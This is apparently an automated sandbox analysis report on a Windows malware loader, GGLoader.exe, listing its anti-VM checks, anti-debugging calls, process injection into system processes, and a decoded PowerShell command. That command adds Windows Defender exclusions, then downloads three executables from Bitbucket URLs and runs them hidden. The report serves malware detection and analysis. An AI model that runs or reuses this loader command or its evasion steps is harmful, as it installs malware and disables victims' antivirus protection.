Source: lsass.exe, 0000002C.00000002.2961113290.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2223603284.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000002.2956835957.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000000.2231046863.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2273754697.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.2954077537.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2274757893.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2954277150.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.2962965792.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2277933173.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000035.00000002.2964974668.000001D55862B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: lsass.exe, 0000002C.00000002.2963978319.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicshutdownNT SERVICE
Source: powershell.exe, 00000011.00000002.2039902997.00000270B78B8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
Source: lsass.exe, 0000002C.00000002.2972274642.00000202C037F000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTVMWare
Source: svchost.exe, 00000035.00000000.2301742572.000001D559C12000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
Source: svchost.exe, 00000035.00000003.2354475189.000001D5592A3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 00000035.00000000.2294844228.000001D558643000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: (@vmcitpA
Source: svchost.exe, 0000002D.00000002.2959155286.000002A66066B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 00000031.00000002.2952925182.000002295CE00000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: lsass.exe, 0000002C.00000002.2963978319.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicheartbeatNT SERVICE
Source: svchost.exe, 00000035.00000000.2301742572.000001D559C12000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
Source: dwm.exe, 0000002E.00000000.2237368637.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: C:\Windows\System32\dllhost.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\dllhost.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Source: C:\Users\user\Desktop\GGLoader.exe Code function: 0_2_00007FFD9B885D4D CheckRemoteDebuggerPresent, 0_2_00007FFD9B885D4D
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\GGLoader.exe Process queried: DebugPort Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_00793F90 IsDebuggerPresent,GetModuleHandleW,GetProcAddress,GetTickCount64,NtDelayExecution,GetTickCount64, 6_2_00793F90
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_007BB2BB mov eax, dword ptr fs:[00000030h] 6_2_007BB2BB
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_007AFF51 mov ecx, dword ptr fs:[00000030h] 6_2_007AFF51
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: 35_2_00C0B2BB mov eax, dword ptr fs:[00000030h] 35_2_00C0B2BB
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: 35_2_00BFFF51 mov ecx, dword ptr fs:[00000030h] 35_2_00BFFF51
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_007BDA5F GetProcessHeap, 6_2_007BDA5F
Enables debug privileges
Source: C:\Users\user\Desktop\GGLoader.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\dllhost.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_007A5B6A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_007A5B6A
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_007A9BF3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_007A9BF3
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_007A5CCC SetUnhandledExceptionFilter, 6_2_007A5CCC
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_007A5DD5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_007A5DD5
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: 35_2_00BF9BF3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 35_2_00BF9BF3
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: 35_2_00BF5B6A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 35_2_00BF5B6A
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: 35_2_00BF5CCC SetUnhandledExceptionFilter, 35_2_00BF5CCC
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: 35_2_00BF5DD5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 35_2_00BF5DD5
Source: C:\Windows\System32\conhost.exe Code function: 39_2_000002505E597E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 39_2_000002505E597E70
Source: C:\Windows\System32\conhost.exe Code function: 39_2_000002505E59B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 39_2_000002505E59B50C
Source: C:\Windows\System32\conhost.exe Code function: 41_2_000001C08C1B7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 41_2_000001C08C1B7E70
Source: C:\Windows\System32\conhost.exe Code function: 41_2_000001C08C1BB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 41_2_000001C08C1BB50C
Source: C:\Windows\System32\dllhost.exe Code function: 42_2_000002131118B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 42_2_000002131118B50C
Source: C:\Windows\System32\dllhost.exe Code function: 42_2_0000021311187E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 42_2_0000021311187E70
Source: C:\Windows\System32\winlogon.exe Code function: 43_2_00000225DC647E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 43_2_00000225DC647E70
Source: C:\Windows\System32\winlogon.exe Code function: 43_2_00000225DC64B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 43_2_00000225DC64B50C
Source: C:\Users\user\Desktop\GGLoader.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: amsi64_7520.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7520, type: MEMORYSTR
Adds a directory exclusion to Windows Defender
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force Jump to behavior
Contains functionality to inject code into remote processes
Source: C:\Windows\System32\dllhost.exe Code function: 42_2_0000000140001DB4 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess, 42_2_0000000140001DB4
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\winlogon.exe EIP: DC612908
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\lsass.exe EIP: C0AB2908
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 612D2908
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\dwm.exe EIP: AED92908
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 87992908
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 53772908
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 5D532908
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 67D2908
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 5B392908
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: EBFD2908
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 59042908
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: A9E72908
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 73162908
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 4E862908
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 473C2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6F9D2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 83BC2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D3F72908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A4152908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BDF32908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C0262908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C9F32908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 645B2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7B2C2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4F62908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2AB42908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4ADB2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1992908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 25DA2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F5352908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F0D62908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FFB2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C2572908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8BA22908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 66902908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13FF2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8D572908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 69B42908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CC742908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5DA72908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 199D2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F3892908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3B82908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 40E42908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A6532908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 27BC2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7B152908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 621A2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2F482908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8B4B2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 683D2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 87C2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2E262908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6C5E2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D5932908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FC652908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 777C2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 33B42908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8D0A2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AB4C2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2A642908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6CF32908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 49352908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 60DA2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5E7B2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2F7C2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E8152908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 52342908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9DA92908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 602E2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: ABF92908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D652908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D1162908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A6A82908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13CB2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B1812908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F5FC2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5E562908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8C182908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14E2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1512908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FC572908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E7AB2908
Encrypted powershell cmdline option found
Source: C:\Users\user\Desktop\GGLoader.exe Process created: Base64 decoded <#grx#>Start-Process powershell -WindowStyle Hidden -ArgumentList "Add-Type -AssemblyName System.Windows.Forms;<#nus#>[System.Windows.Forms.MessageBox]::Show('No Virtual Machine/Server is allowed! Try running on a different device!','','OK','Error')<#wkk#>;";<#efr#> Add-MpPreference <#fpg#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#nzh#> -Force <#aqd#>;(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/5940jg9834/gf3443f3/raw/0adfaef4f847a17ea4e4f656dcd85e76293780ed/D.exe', <#pjx#> (Join-Path <#vcy#> -Path $env:Temp <#ycy#> -ChildPath 'LicenseGet.exe'))<#bgk#>; (New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/recheatsorg/recheatsdirect/raw/00eb2d0b436591fce1153baca762509e762f2ce4/CLP.exe', <#sbd#> (Join-Path <#hqu#> -Path $env:Temp <#kws#> -ChildPath 'LicCheck.exe'))<#kix#>; (New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/recheatsorg/recheatsdirect/raw/00eb2d0b436591fce1153baca762509e762f2ce4/Devmin.exe', <#duq#> (Join-Path <#hht#> -Path $env:Temp <#usr#> -ChildPath 'LicSend.exe'))<#hwn#>; Start-Process -FilePath <#cmj#> (Join-Path -Path $env:Temp <#guj#> -ChildPath 'LicenseGet.exe')<#tab#>; Start-Process -FilePath <#iun#> (Join-Path -Path $env:Temp <#vie#> -ChildPath 'LicCheck.exe')<#njw#>; Start-Process -FilePath <#ixi#> (Join-Path -Path $env:Temp <#tml#> -ChildPath 'LicSend.exe')<#dng#>
Source: C:\Users\user\Desktop\GGLoader.exe Process created: Base64 decoded <#grx#>Start-Process powershell -WindowStyle Hidden -ArgumentList "Add-Type -AssemblyName System.Windows.Forms;<#nus#>[System.Windows.Forms.MessageBox]::Show('No Virtual Machine/Server is allowed! Try running on a different device!','','OK','Error')<#wkk#>;";<#efr#> Add-MpPreference <#fpg#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#nzh#> -Force <#aqd#>;(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/5940jg9834/gf3443f3/raw/0adfaef4f847a17ea4e4f656dcd85e76293780ed/D.exe', <#pjx#> (Join-Path <#vcy#> -Path $env:Temp <#ycy#> -ChildPath 'LicenseGet.exe'))<#bgk#>; (New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/recheatsorg/recheatsdirect/raw/00eb2d0b436591fce1153baca762509e762f2ce4/CLP.exe', <#sbd#> (Join-Path <#hqu#> -Path $env:Temp <#kws#> -ChildPath 'LicCheck.exe'))<#kix#>; (New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/recheatsorg/recheatsdirect/raw/00eb2d0b436591fce1153baca762509e762f2ce4/Devmin.exe', <#duq#> (Join-Path <#hht#> -Path $env:Temp <#usr#> -ChildPath 'LicSend.exe'))<#hwn#>; Start-Process -FilePath <#cmj#> (Join-Path -Path $env:Temp <#guj#> -ChildPath 'LicenseGet.exe')<#tab#>; Start-Process -FilePath <#iun#> (Join-Path -Path $env:Temp <#vie#> -ChildPath 'LicCheck.exe')<#njw#>; Start-Process -FilePath <#ixi#> (Join-Path -Path $env:Temp <#tml#> -ChildPath 'LicSend.exe')<#dng#> Jump to behavior
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe NtQuerySystemInformation: Direct from: 0x7FF7D3B994FE Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 2BAAED90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1845B390000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2108BA20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 29166900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: 87C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000 value starts with: 4D5A
